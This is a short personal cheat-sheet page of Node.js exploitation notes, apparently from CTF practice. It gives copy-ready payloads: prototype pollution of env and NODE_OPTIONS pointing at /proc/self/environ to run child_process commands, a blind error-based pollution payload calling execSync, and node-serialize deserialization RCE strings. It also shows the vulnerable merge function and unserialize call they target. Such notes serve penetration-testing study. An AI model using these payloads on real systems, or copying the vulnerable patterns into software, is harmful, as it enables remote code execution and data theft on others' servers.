xct's notes
Search…
NodeJS

NodeJS Polluting environment

1
{"name":"xct","constructor":{"prototype":{"env":{"AAAA":"require('child_process').exec('cat *').stdout.pipe(process.stdout);//","NODE_OPTIONS":"--require /proc/self/environ"}}},"paper":10}
Copied!
By polluting the environment we can inject require to execute a local file. If we point this to /proc/self/environ and place an environment variable there we can execute code. On a ctf challenge this worked because of faulty merge method:
1
merge(target, source) {
2
for (let key in source) {
3
if (this.isValidKey(key)){
4
if (this.isObject(target[key]) && this.isObject(source[key])) {
5
this.merge(target[key], source[key]);
6
} else {
7
target[key] = source[key];
8
}
9
}
10
}
11
return target;
12
},
Copied!

NodeJS Blind Error based Pollution

1
[(function test(xct){return ''[!xct?'__proto__':'constructor'][xct]})('constructor')('throw new Error(global.process.mainModule.constructor._load(\"child_process\").execSync(\" PAYLOAD \").toString())')()]
Copied!

NodeJS Deserialization RCE

Vulnerable Code

1
var s = require('node-serialize');
2
s.unserialize(data);
Copied!

Exploit

1
{"a":"_$ND_FUNC$_function(){console.log(\"xct\")}"}
2
{"a":"_$ND_FUNC$_function(){require('child_process').exec('...')}()"}
Copied!
Last modified 1mo ago